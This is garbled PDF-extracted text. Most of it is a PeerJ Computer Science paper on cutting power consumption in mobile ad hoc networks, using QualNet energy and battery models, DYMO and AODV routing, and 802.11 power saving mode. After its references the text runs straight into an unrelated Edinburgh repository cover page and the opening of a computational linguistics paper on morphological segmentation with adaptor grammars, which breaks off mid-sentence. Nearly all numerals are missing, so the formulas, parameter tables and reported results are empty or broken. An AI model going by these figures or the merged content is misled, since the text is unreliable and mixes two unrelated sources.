sleep mode. qualnet supports four kinds of radio energy models, • generic • mica-motes • mica z, and • user defined energy consumption of the nodes the energy model presented by the qualnet simulator gives the measure of energy absorbed by the nodes in different modes. a node in a network exhibit mostly four states, a) transmit mode: the device dispatches the data to the destination or intermittent node b) receive mode: the node retrieves the data from the source node or intermittent node c) idle mode: there is no active session for the node when present in an idle state but the node tends to continuously hear the signals within its range from its neighboring nodes, in the event that neighboring nodes have data for the intended node, so as to establish a connection d) sleep mode: sleep mode enables the station to rest itself down for a while. however, in sleep mode, the ms stays associated with the base station. in this way, in sleep mode, the bs holds all the data that is associated with the node in the sleep mode, as it does amid connected mode. fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. formulae’s used to calculate the energy consumed in particular mode etrans (energy consumed in transmit mode) = (transmitting current *volt) * time erecv (energy consumed in receive mode) = (receiving current *volt) * time eidle (energy consumed in idle mode) = (idle current *volt) * time esleep (energy consumed in sleep mode) = (sleep current *volt) * time formulae’s used to calculate the total energy consumption for a particular station power consumption at base station = etrans+erecv+eidle+esleep power consumption at relay station = etrans+erecv+eidle+esleep power consumption at mobile station = etrans+erecv+eidle+esleep battery model the battery is basically a storehouse of electrical charge which gets refilled on recharging and empties itself when being absorbed. along these lines, the functioning of the peripherals, for example, cpu, dc-dc converter, sensors, memory blocks, and so forth, appended to the battery are constrained due to limited battery charge. a dc-dc converter goes about as a voltage controller for different parts. with the assistance of battery models provided by the qualnet, the system productivity and the functioning of the nodes can be contemplated under various circumstances. different battery models include (thontadharya et al., ) electro-chemical models, electrical-circuit models, analytical models, kinetic battery models, and stochastic models. each one of them has certain points of interest and flaws. in analytical models, peukert’s law is employed to evaluate the battery lifetime. in addition to peukert’s law, analytical model makes use of fick’s law and faraday’s law to enhance the estimation of a battery lifetime that focused around one-dimensional diffusion. thus, energy utilization of wireless devices plays a major role and can be fused with the battery models offered by qualnet simulator. some of the battery models supported by qualnet simulator are: • precise service life estimator—an exact evaluation of the span of a remote device that utilizes battery under predefined circumstances is estimated through the use of precise service life estimator battery model utilizing rakhmatov’s analytical model. batteries, for example, duracell, aa, aaa, and itsy are employed for this battery model. • precise residual life estimator—precise residual life estimator model measures the battery’s residual charge while circuit absorbs charge from the battery. one of the primary highlights of the battery is that, when the battery disperses the energy to the peripherals, a bit of charge is wasted. • linear model—linear model utilizes the coulomb counting method, which calculates the absorbed coulombs and by comparing the disseminated coulombs and a pre-recorded battery capacity gives the service life of the battery. related work shrimoy tripathy scrutinized the performance of ieee . power saving mode (tripathy, ) and acknowledged that certain incapabilities are observed such as, a beacon frame or a traded atim frames, they stay in dynamic mode, irrespective of whether there are any frames to be forwarded to the destination node. this increases the power utilization fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. of the system. bearing in mind to scale down the power consumption ‘probabilistic energy efficient routing’ convention (peer) was designed by mansi rajgor, prasanna shete, r. n. awale. while dealing with route handling in this routing protocol, the node checks its own residual battery charge, in view of which, it advances the packets with some probability associated to it. this probability depends on the level of the remaining of the battery level of the node. in this way, a route is discovered by nodes with high energy and thus an attempt is made to save the power and shield the system from early exhaustion. later, when an increase in mobility of nodes caused high power reduction in nodes then nand, astya & ali ( ) concentrated on mobility models that depict the action of the portable device. furthermore, the location, speed, and acceleration that change after some time, were observed. mobility models can be of numerous sorts, some of which are file based mobility model, group based mobility model, pedestrian mobility model, and random waypoint mobility model. kandari & pandey ( ) evaluated the energy consumption of aodv, dsr, and dymo routing protocol by employing micaz energy model. at the end of evaluation, the outcomes were analyzed, and the examination report demonstrated that the energy consumed out of idle mode is high when compared to transmit and receive mode. likewise, it has been noticed that dymo gives the highest throughput, which is then joined by dsr and aodv. simultaneously, an energy efficient routing protocol (eerp) was proposed by bhatt, jain & upadhyay ( ). amid the course route discovery and reply process, the distance isolating two successive nodes is registered depending on rss (received signal strength). it pursues the standard ‘‘if the nodes are adjacent to one another, rss is high’’, if rss is high than threshold value then the node will consider forwarding the packet via that route. jain ( ) provides the comparative assessment of battery usages with the existing system reports under portable situations. apart from that, the heterogeneous system topology gives its points of interest over existing systems. the batteries, for example, aa and aaa are utilized in service life estimator mode and this model has been viewed as the battery model which gives data on remaining battery in a node after a particular simulation time. energy models for the bs (base station), rs, (relay station) and ms (mobile station) are considered, for which the qualnet simulator give the energy utilization of the node. swain et al. ( ) focused on discrete time markov chain model that functions for the delivery of announcement traffic indication map (atim) and data frames in ieee . dcf power save mode, and further introduces analytical models and power utilization of the ieee . dcf in psm. the observation of the impact of the span of beacon interval on the network execution confirms the requirement for a dynamic beacon window based power saving mechanism to increase the network lifetime without deteriorating the network performance. moustafa, vasan & raymond ( ) informed that, in dcf, the wait state ensures independence from deadlocks, as one station could conceivably be starved and due to the synchronous task between the ap and the stations, pcf deadlock freedom is achieved. anuj, sadawarti & anil ( ) performed operations on dynamic manet on-demand (dymo) routing protocol and investigated its execution depending on different simulation parameters. the simulation has been performed with variable pause times and concluded that dynamic manet on-demand (dymo)’s performance is better in every aspect when compared to existent routing fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. protocols. saranya & ravi ( ) proposed number of strategies like power saving by varying transmission power, power saving by utilizing power-aware routing protocol, and power saving by employing power management techniques, which also gives a superior view on which strategy can be utilized relying upon the situation. the techniques studied can be utilized on scenarios such as, distance between two nodes, its delay tolerance, data traffic rate, and critical utilization of battery. furthermore, it proposes that utilizing an appropriate algorithm which not just improves the survival time of the system but also makes the communication increasingly effective. sangwan & pooja ( ) mentioned about different approaches to preserve power for the efficient working of the network with the goal that ‘it can stay in functioning mode to the extent that it would be possible’. some of them are energy effective routing protocol, minimum battery cost routing, bee ad hoc, sleep impact, mobility model, power conservation in node, heterogeneous and homogeneous system. lubna naaz fatima, fahmina taranum, syeda hajra mahin gave detailed analysis of different types of routing algorithm in fatima, mahin & taranum ( ) and a survey on different strategies that can be used for efficient power consumption and reduction in power consumption to enhance the network lifespan. whereas in taranum, khaleel ur & muhammed ( ) gave a comparison between the ieee standards . and . in terms of power consumption among the mobile nodes, relay node and base station. this paper made use of energy models and battery models. further, the authors implemented the code-division multiple access (cdma) to increase the signal range between the relay node and the base node. materials & methods the proposed architecture can be mainly categorized into two, ) network architecture without relay node ) network architecture with a relay node network topology without relay node: in this segment, network topology is modeled using the qualnet simulator. the structure of the framework is given in fig. . the arrangement contains one base station i.e., node and is responsible for forwarding the data to the respective destined nodes, three mobile stations i.e., node , and that travel along the trajectory represented with red flags, a subnet, cbr (traffic generator) and point to point link (blue dashed line). node is linked with mobile nodes using a subnet. network topology with single relay node: up until now it is very clear that multi-hop relay systems can find it as being an increasingly productive procedure to enhance the present state affairs. presently, pondering upon an exceedingly portable condition, this paper takes into account the single hop architecture for the network. figure portrays the model that has been created with the assistance of the qualnet simulator. the arrangement contains one base station, i.e., node , one relay station i.e., node , three mobile stations i.e., node , and , two subnets, cbr (traffic generator) and point to point link (blue dashed line). the relay node acts as a caching node, likewise responsible for communication between the source and destination nodes in the framework. node acts as a relay node/ intermediate node, whenever the source node and the destination node fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure network architecture without relay node. an architecture unveiling three mobile nodes and an access point connected via a point to point link and cbr traffic generator. full-size doi: . /peerjcs. /fig- are beyond reach, multi-hop data transfer can be conducted through intermediate/relay nodes. since the node is adjacent to base node it tends to receive the data from it and forwards it to the mobile nodes. simulation parameters the nodes present in the pair of the architectures can be configured by the means of the parameters specified in table . the energy model parameters specified in table enable the user to assign the energy utilization of the nodes in various power modes (transmit, receive, idle, and sleep). table encompasses the battery model parameters that give an exact evaluation of the life of a device that put to use battery under predefined circumstances. the parameters specified in table aims to enable the power saving mode for an access point, whereas the parameters specified in table intends to enable the power saving mode for a mobile station. figure indicates the flow of power saving mode. scenarios results for more than one scenario is generated i.e., results are provided for not only the amount of power saved but also to obtain a power efficient routing protocol. case ) comparison between routing protocols based on power consumption comparison of energy consumption of nodes using ad hoc on-demand distance vector (aodv) and dynamic manet on-demand (dymo) routing protocol is given for architecture with relay node using ieee . for seconds of simulation time, to obtain fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure network architecture with a relay node. an architecture unveiling three mobile nodes, an ac- cess point and a relay node connected via a point to point link and cbr traffic generator. full-size doi: . /peerjcs. /fig- table node configuration parameters. parameters for basic configuration of mobile nodes, relay node and access point. parameters values mobility model file-based network protocol ipv routing protocol dymo radio type . / . mac protocol . b/ . ip input queue size , bytes promiscuous mode enabled antenna model omnidirectional path loss model two ray fading model ricean maximum velocity m/s a power efficient routing protocol. case also made use of energy model, battery models and csma/ca (carrier sense multiple access/collision avoidance). case ) energy consumption of nodes using power saving mode case made use of both the architectures i.e., with and without multi hop relay strategy to give a comparative assessment of power consumption between the architectures, also fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table energy model parameters. parameters to enable user-specified energy model in mobile node, re- lay node and an access point. parameters value energy model user-defined transmission current load mamp reception load mamp idle current load mamp sleep current load mamp supply voltage of interface . v table battery model parameters. parameters to enable battery model in mobile node, relay node and an access point. parameters value battery model service life estimator battery charge monitoring interval s battery type ms- duracell aaa, rn-duracell aa, bs-duracell aa table power saving mode at mobile node. parameters to enable power save mode in the mobile node and relay node. parameter value power saving mode enabled station scan type passive dtim period listen interval utilizing . power saving mode, energy model, battery model and dynamic manet on-demand (dymo) routing protocol. case ) energy consumption of nodes for . case made use of both the architectures i.e., with and without multi hop relay strategy to give a comparative assessment of power consumption between the architectures, also utilizing energy model, battery model and dynamic manet on-demand (dymo) routing protocol. case ) comparison of . , . e and . power saving mode case generated results for . , . e (mobility model) and . power saving mode for metrics such as end to end delay and jitter to monitor the quality of service. case also utilized energy models, battery model and dynamic manet on-demand (dymo) routing protocol for architecture with relay node. algorithm for power saving mode of a mobile station step : configure the . power saving mode parameters on the node enter the power saving mode by setting the mngmt psw bit as set the listening interval (units = time) and send the association request to access point fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table power saving mode at an access point. parameters to enable power save mode in an access point. parameter value station type access point power saving mode enabled beacon-interval beacon-stationrt-time dtim-period step : enter the sleep state step : during listening interval, node wakes up step : listen to the beacon nodes if (the beacon nodes contains the association id of the station and bitmap control= ). then send ps-poll to access point to retrieve the data go to step else go to step step : send acknowledgement frames to access point after receiving the data step : go to step algorithm to calculate the power consumption step : initialize the variables: duration, actual duration = , pxi (energy consumed by current mode) = , now=getnodetime (); step : generate values for the above variables of a node at a particular instance actual duration = (now-start time)/seconds; if (duration = actduration) then go to step else go to step step : check the state of the battery. if(remaining battery charge! = ) then go to step and calculate the power consumption in current mode and decrement the battery charge. else now = dead time of battery; go to step step : calculate the energy consumed by node energy consumed in transmit mode, et = transmitting current * voltage * time energy consumed in receive mode, er = receiving current * voltage * time energy consumed in idle mode, ei = idle current * voltage * time energy consumed in sleep mode, es = sleep current *voltage * time fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure algorithm for power saving mode. a step-by-step procedure on the working of power saving mode for the mobile nodes. full-size doi: . /peerjcs. /fig- remaining battery charge = total battery charge–energy consumed by current activity (ex) increment the value of energy consumed in x mode. total energy in x (transmit/ receive/ idle/ sleep) mode =ex + pxi pxi = total energy in x mode; step : go to step step : print the output power consumption at mobile station = ptrans + precv + pidle + psleep (all ms) power consumption at base station = ptrans + precv + pidle + psleep (all bs) power consumption at relay station = ptrans + precv + pidle + psleep (all rs). fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure comparison of aodv and dymo. a graphical representation giving a comparison on the working of aodv and dymo routing protocol in terms of energy utilization. full-size doi: . /peerjcs. /fig- results case : comparison between routing protocols based on power consumption the results were established for the architecture that made use of the network topology parameters and energy model parameters. it also utilizes the ieee . standard for aodv and dymo routing protocol for s. execution of aodv and dymo for power utilization is assessed, and a combined graphical representation in fig. is given to clarify the performance of aodv and dymo where n , n , and n are mobile stations, n is the base station and n is the relay station. thus, from this representation it can be derived that dymo consumes less power when compared with aodv. in this way, it is inferred that the usage of dymo is extremely productive regarding energy utilization, thus expanding the service life of the battery. case : energy consumption of nodes using power saving mode the simulations have been carried out by employing user-defined energy model, battery models and dymo routing protocol for . standards including power save mode on both the topologies i.e., architecture without relay node and architecture with relay node. user-defined energy model allows the user to specify the amount of energy that can be utilized for each of the above-mentioned modes, such that the power utilization are below fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure average of service of mobile nodes using psm for min. a graphical representation of aver- age residue power for architecture with and without relay node; the green bars represents average service life of the proposed strategy i.e., power saving mode of ieee . , whereas the yellow bars represents average service life of the existing system strategy i.e., simply making use of ieee . for minutes of simulation time. full-size doi: . /peerjcs. /fig- mentioned with the threshold level so as to prevent the network from early exhaustion. on comparing the average of the service life obtained in (jain, ) for , and min and the average of the service life obtained in case scenario for simulation time , and min, it can be estimated that psm proves to be efficient. the comparison for the values generated in (jain, ) and case scenario can be depicted from figs. , and the service life of batteries is assessed utilizing eqs. ( ), ( ) and ( ) and is captured in table . the total residue provided by case scenario for simulation time , and min is . , . , and . dbm where as the total residue provided in (jain, ) for simulation time , and min is . , . and . dbm. case : energy consumption of nodes for . in this section, the simulations are performed using energy model parameters, battery model parameters, ieee . , and dymo routing protocol for , and min on both architectures i.e., architecture with relay node and architecture without relay node. after performing the simulation, the estimations of the average of the residual of battery fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure average of residue power of mobile nodes using psm for min. a graphical representation of average residue power for architecture with and without relay node, the green bars represents average service life of the proposed strategy i.e., power saving mode of ieee . whereas the yellow bars repre- sents average service life of the existing system strategy i.e., simply making use of ieee . for min- utes of simulation time. full-size doi: . /peerjcs. /fig- in mah for every mobile station for case scenario and the average of the residue in (jain, ) are captured, and a comparative assessment is given in fig. for the duration of min, for min in fig. , and for min in fig. . assessments are performed to get the net power saving utilizing the below formulas: x(a) = average energy of mobile stations in architecture without relay node x(b) = average energy of mobile stations in architecture with a relay node x(net)=x(b)−x(a)(mah) to get the power saving in dbm the following conversions take place as shown, (x)mah∗(v )=(y )mwh ( ) (z)mw =ymwh/simulation time (hours) (watt-hour to milliwatt conversion) ( ) power−dbm= . ∗(log(z(mw)/ mw )) ( ) fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure average of residue power of mobile nodes using psm for min. a graphical representation of average residue power for architecture with and without relay node, the green bars represents average service life of the proposed strategy i.e., power saving mode of ieee . whereas the yellow bars repre- sents average service life of the existing system strategy i.e., simply making use of ieee . for min- utes of simulation time. full-size doi: . /peerjcs. /fig- table evaluation of net power saving in case scenario. simulation time no hop . (mah) hop . (mah) difference (hop-no hop) y (mah) x(mwh)=v ∗y z =log(x(mw )) pdbm= ∗z , . , . , . , . . . , . , . , . , . . . , . , . , . , . . . the evaluated results for , , and simulation time are captured in table . it can be deduced that the service life obtained for simulation time , and min is . , . and . dbm. it can also be concluded that, since case makes no use of power saving mode, the residual battery charge is very low. hence, psm proves its efficiency. fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure average of residue power of mobile nodes using . for minutes. a graphical represen- tation of average residue power for architecture with and without relay node; the green bars represents av- erage service life of strategy that made use of ieee . , whereas the yellow bars represents existing sys- tem strategy i.e., simply making use of ieee . for minutes of simulation time. full-size doi: . /peerjcs. /fig- case : comparison of . , . e and . power saving mode a comparison is done between . , . e and . power saving mode by considering metrics such as end-to-end delay and average jitter. from fig. it can be concluded that end-to-end delay and average jitter is negligible in . , whereas in . e, it is minimal. though power consumption is less in power saving mode but average jitter and end-to-end delay is high in comparison with . and . discussion in our findings certain approaches are implemented so as to restrict the power utilization among the nodes in the system, which utilizes ieee standards—ieee . and ieee . . distributed coordinated function (dcf) assumes to evade the crash and conflict involved in the wireless medium by utilizing certain parameters. for example, difs, sifs, back off interval time and network allocation vector (nav) among the stations. fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure average of residue power of mobile nodes using . for min. a graphical representa- tion of average residue power for architecture with and without relay node; the green bars represents aver- age service life of strategy that made use of ieee . , whereas the yellow bars represents existing system strategy i.e., simply making use of ieee . for min of simulation time. full-size doi: . /peerjcs. /fig- power-aware routing algorithm such as dymo majorly affects the utilization of energy in the network. energy model assesses the energy consumed by the nodes. additionally, the user defined energy model enables the user to specify the threshold value, so that power utilization can be constrained. battery model gives a summarization of the service time provided by the nodes along with residual charge in the battery for the associated nodes. power saving mode utilizes the beacon frames that act as a cache which stores all information about a station in power saving mode. the access point broadcasts the beacon frames that contain the address of the node, the node for which the data is stocked up at the access point. whenever the stations hear a beacon frame containing its address, it will awake and after getting acknowledgement in response to ps-poll frame the station enters the active state. for the above-mentioned theory, simulations were performed by considering different parameters and the outcomes demonstrate that dymo as the proficient power-aware routing protocol. apart from that, a correlation was made between the simulation results presented in jain ( ) and case where power saving mode is administered, it was concluded that power saving mode additionally brings up the considerable power saving fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure average of residue power of mobile nodes using . for min. a graphical representa- tion of average residue power for architecture with and without relay node; the green bars represents aver- age service life of strategy that made use of ieee . , whereas the yellow bars represents existing system strategy i.e., simply making use of ieee . for minutes of simulation time. full-size doi: . /peerjcs. /fig- table evaluation of net power saving in case scenario. simulation time no-hop . hop . current diff (mah) power mwh ( ) log(x(mw)) saving ( )dbm . . . . . . . . . . . . . . . . . . option. case scenarios, on assessment, it is persuaded that case while utilizing . does not provide much residual power when compared to case results, hence, power saving mode proves it efficiency, but the results in case presented that power saving mode only diminishes the power usage but the qos is not achieved. conclusions the proposal aims at reducing power consumption in manet’s by implementing battery model, energy model, dymo routing protocol and power saving mode by using qualnet v . simulator. hence, with the assistance of generated results, an analysis can be made, fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure performance analysis of . e, . and . psm. performance of . e, . and . psm is analysed for metrics such as end-to-end delay and jitter for min of simulation time. full-size doi: . /peerjcs. /fig- which suggests that a considerable amount of energy has been preserved and plays a major role to prolong the service life of the battery of mobile devices. the future extension for this system would be in the class of ngn’s, to adequately save power at the mobile stations and further to improve the qos of the heterogeneous network by reducing its power consumption. consequently, the implementation may include handover process i.e., horizontal handover, vertical handover and reduction of power consumption during the handover process. an exhaustive examination regarding the relay station arrangement and execution is essential prior to this heterogeneous system implementation. acknowledgements we would like to acknowledge and thank our college management for providing us enough resources for carrying out our work. additional information and declarations funding the authors received no funding for this work. fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. competing interests the authors declare there are no competing interests. author contributions • lubna naaz fatima conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft, testing. • syeda hajra mahin analyzed the data, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft, drafting. • fahmina taranum conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, performed the computation work, authored or reviewed drafts of the paper, approved the final draft, idea. data availability the following information was supplied regarding data availability: raw data and code are available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references anuj kg, sadawarti h, anil kv. . implementation of dymo routing protocol. in- ternational journal of information technology, modeling and computing ( ): – . bhatt ur, jain p, upadhyay r. . an enhanced aodv- energy efficient routing protocol for manet. in: nirma university international conference on engineering (nuicone). chen x, xie y, wang c. . implementation and analysis of ieee psm in ns- . in: international conference on machine learning and cybernetics. guilin. comlab. . available at http://www.comlab.hut.fi/studies/ /luentokalvot/ _ wlan .pdf . didawiki. . available at http://didawiki.cli.di.unipi.it/lib/exe/fetch.php/rhs/slides- _dymo_n_ .pdf . fatima ln, mahin sh, taranum f. . power management strategies in manets— a review. international journal of recent technology and engineering (ijrte) ( s): – . jain a. . reduction of power consumption at mobile station in multi-hop networks in mobile environments. in: international conference on emerging technology trends in electronics, communication, and networking. kandari s, pandey mk. . evaluation of energy consumption by nodes of manet. in: national conference on recent advances in electronics & computer engineering, lit roorkee india. fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://www.comlab.hut.fi/studies/ /luentokalvot/ _wlan .pdf http://www.comlab.hut.fi/studies/ /luentokalvot/ _wlan .pdf http://didawiki.cli.di.unipi.it/lib/exe/fetch.php/rhs/slides- _dymo_n_ .pdf http://didawiki.cli.di.unipi.it/lib/exe/fetch.php/rhs/slides- _dymo_n_ .pdf http://dx.doi.org/ . /peerj-cs. moustafa ay, vasan a, raymond em. . specification and analysis of the dcf and pcf protocols in the standard using systems of communicating machines. in: ieee. paris, france. nand p, astya r, ali aw. . performance analysis and impact of different mobility model on the specific configured network with ieee for wsns. in: interna- tional conference on computing communication and automation (iccca). sangwan y, pooja . . a survey on battery conservation approaches in manet. international journal of scientific & engineering research ( ): – . saranya as, ravi g. . a review on power saving techniques in manet. interna- tional journal of scientific and research publications ( ): – . swain p, chakraborty s, nandi s, bhaduri p. . performance modeling and evaluation of ieee ibss power save mode. in: elsevier. guwahati, india. taranum f, khaleel ur rk, muhammed a. . in: singh pk, ed. power consumption analysis in multi-hop networks of mobile environments. singapore: springer, – . thontadharya hj, shwetha d, bhat ms, devaraju jt. . effect of idle mode on power savingin mobile wimax network. in: springer. new delhi. tripathy s. . study and analysis of performance of ieee . power saving mode. department of computer science and engineering national institute of technology, rourkela. further reading dd.wrt.com. . available at https://wiki.dd-wrt.com/wiki/index.php/advanced_ wireless_settings. ionos. . available at https://www.ionos.com/digitalguide/server/know-how/csmaca- carrier-sense-multiple-access-with-collision-avoidance/ . kim b, park j, choi y-h. . power saving mechanisms of ieee e: sleep mode vs. idle mode. in: international symposium on parallel and distributed processing and applications(ispa). bisa research grant of keimyung university and the research grant of kwangwoon university. rajgor m, shete p, awale rn. . probabilistic energy efficient routing protocol for wireless sensor network. in: international conference on communication information & computing technology (iccic). tanejaa s, kushb a, makkarc a, bhushand b. . power management in mobile adhoc network. international transaction journal of engineering, management, & applied sciences & technologies ( ): . fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://wiki.dd-wrt.com/wiki/index.php/advanced_wireless_settings https://wiki.dd-wrt.com/wiki/index.php/advanced_wireless_settings https://www.ionos.com/digitalguide/server/know-how/csmaca-carrier-sense-multiple-access-with-collision-avoidance/ https://www.ionos.com/digitalguide/server/know-how/csmaca-carrier-sense-multiple-access-with-collision-avoidance/ http://dx.doi.org/ . /peerj-cs. edinburgh research explorer minimally-supervised morphological segmentation using adaptor grammars citation for published version: sirts, k & goldwater, s , 'minimally-supervised morphological segmentation using adaptor grammars', transactions of the association for computational linguistics, vol. , no. may, pp. - . <http://aclweb.org/anthology//q/q /q - .pdf> link: link to publication record in edinburgh research explorer document version: publisher's pdf, also known as version of record published in: transactions of the association for computational linguistics general rights copyright for the publications made accessible via the edinburgh research explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights. take down policy the university of edinburgh has made every reasonable effort to ensure that edinburgh research explorer content complies with uk legislation. if you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim. download date: . apr. http://aclweb.org/anthology//q/q /q - .pdf https://www.research.ed.ac.uk/portal/en/publications/minimallysupervised-morphological-segmentation-using-adaptor-grammars(e fc - a - - b - e e b).html transactions of the association for computational linguistics, ( ) – . action editor: kristina toutanova. submitted / ; published / . c© association for computational linguistics. minimally-supervised morphological segmentation using adaptor grammars kairit sirts institute of cybernetics tallinn university of technology sirts@phon.ioc.ee sharon goldwater school of informatics the university of edinburgh sgwater@inf.ed.ac.uk abstract this paper explores the use of adaptor gram- mars, a nonparametric bayesian modelling framework, for minimally supervised morpho- logical segmentation. we compare three train- ing methods: unsupervised training, semi- supervised training, and a novel model selec- tion method. in the model selection method, we train unsupervised adaptor grammars us- ing an over-articulated metagrammar, then use a small labelled data set to select which poten- tial morph boundaries identified by the meta- grammar should be returned in the final output. we evaluate on five languages and show that semi-supervised training provides a boost over unsupervised training, while the model selec- tion method yields the best average results over all languages and is competitive with state-of- the-art semi-supervised systems. moreover, this method provides the potential to tune per- formance according to different evaluation met- rics or downstream tasks. introduction research into unsupervised learning of morphology has a long history, starting with the work of harris ( ). while early research was mostly motivated by linguistic interests, more recent work in nlp often aims to reduce data sparsity in morphologically rich languages for tasks such as automatic speech recogni- tion, statistical machine translation, or automatic text generation. for these applications, however, com- pletely unsupervised systems may not be ideal if even a small amount of segmented training data is available. in this paper, we explore the use of adap- tor grammars (johnson et al., ) for minimally supervised morphological segmentation. adaptor grammars (ags) are a nonparametric bayesian modelling framework that can learn latent tree structures over an input corpus of strings. for example, they can be used to define a morpholog- ical grammar where each word consists of zero or more prefixes, a stem, and zero or more suffixes; the actual forms of these morphs (and the segmentation of words into morphs) are learned from the data. in this general approach ags are similar to many other unsupervised morphological segmentation systems, such as linguistica (goldsmith, ) and the mor- fessor family (creutz and lagus, ). a major difference, however, is that the morphological gram- mar is specified as an input to the program, rather than hard-coded, which allows different grammars to be explored easily. for the task of segmenting utterances into words, for example, johnson and col- leagues have experimented with grammars encoding different kinds of sub-word and super-word structure (e.g., syllables and collocations), showing that the best grammars far outperform other systems on the same corpora (johnson, a; johnson and goldwa- ter, ; johnson and demuth, ). these word segmentation papers demonstrated both the power of the ag approach and the syner- gistic behavior that occurs when learning multiple levels of structure simultaneously. however, the best- performing grammars were selected using the same corpus that was used for final testing, and each paper dealt with only one language. the ideal unsuper- vised learner would use a single grammar tuned on one or more development languages and still perform well on other languages where development data is unavailable. indeed, this is the basic principle be- hind linguistica and morfessor. however, we know that different languages can have very different mor- phological properties, so using a single grammar for all languages may not be the best approach if there is a principled way to choose between grammars. though ags make it easy to try many different pos- sible grammars, the process of proposing and testing plausible options can still be time-consuming. in this paper, we propose a novel method for au- tomatically selecting good morphological grammars for different languages (english, finnish, turkish, german, and estonian) using a small amount of gold-segmented data ( word types). we use the ag framework to specify a very general binary- branching grammar of depth four with which we learn a parse tree of each word that contains several possible segmentation splits for the word. then, we use the gold-segmented data to learn, for each lan- guage, which of the proposed splits from the original grammar should actually be used in order to best segment that language. we evaluate our approach on both a small devel- opment set and the full morpho challenge test set for each language—up to three million word types. in doing so, we demonstrate that using the posterior grammar of an ag model to decode unseen data is a feasible way to scale these models to large data sets. we compare to several baselines which use the annotated data to different degrees: parameter tuning, grammar tuning, supervised training, or no use of annotated data. in addition to existing approaches— unsupervised and semi-supervised morfessor, unsu- pervised morsel (lignos, ), and unsupervised ags—we also show how to use the annotated data to train semi-supervised ags (using the data to accumu- late rule statistics rather than for grammar selection). the grammar selection method yields comparable results to the best of these other approaches. to summarize, our contributions in this paper are: ) scaling ags to large data sets by using the poste- rior grammar to define an inductive model; ) demon- strating how to train semi-supervised ag models, and showing that this improves morphological segmenta- tion over unsupervised training; and ) introducing a novel grammar selection method for ag models whose segmentation results are competitive with the best existing systems. before providing details of our methods and re- sults, we first briefly review adaptor grammars. for a formal definition, see johnson et al. ( ). adaptor grammars adaptor grammars are a framework for specifying nonparametric bayesian models that can be used to learn latent tree structures from a corpus of strings. there are two components to an ag model: the base distribution, which is just a pcfg, and the adaptor, which “adapts” the probabilities assigned to individ- ual subtrees under the pcfg model, such that the probability of a subtree under the complete model may be considerably higher than the product of the probabilities of the pcfg rules required to construct it. although in principle the adaptor can be any func- tion that maps one distribution onto another, johnson et al. ( ) use a pitman-yor process (pyp) (pit- man and yor, ) as the adaptor because it acts as a caching model. under a pyp ag model, the posterior probability of a particular subtree will be roughly proportional to the number of times that sub- tree occurs in the current analysis of the data (with the probability of unseen subtrees being computed under the base pcfg distribution). an ag model can be defined by specifying the cfg rules (the support for the base distribution) and indicating which non-terminals are “adapted”, i.e., can serve as the root of a cached subtree. given this definition and an input corpus of strings, markov chain monte carlo samplers can be used to infer the posterior distribution over trees (and all hyperparam- eters of the model, including pcfg probabilities in the base distribution and pyp hyperparameters). any frequently recurring substring (e.g., a common pre- fix) will tend to be parsed consistently, as this permits the model to treat the subtree spanning that string as a cached subtree, assigning it higher probability than under the pcfg distribution. adaptor grammars have been applied to a wide variety of tasks, including segmenting utterances into words (johnson, a; johnson and goldwa- ter, ; johnson and demuth, ), classifying documents according to perspective (hardisty et al., ), machine transliteration of names (huang et al., ), native language identification (wong et al., ), and named entity clustering (elsner et al., ). there have also been ag experiments with morphological segmentation, but more as a proof of 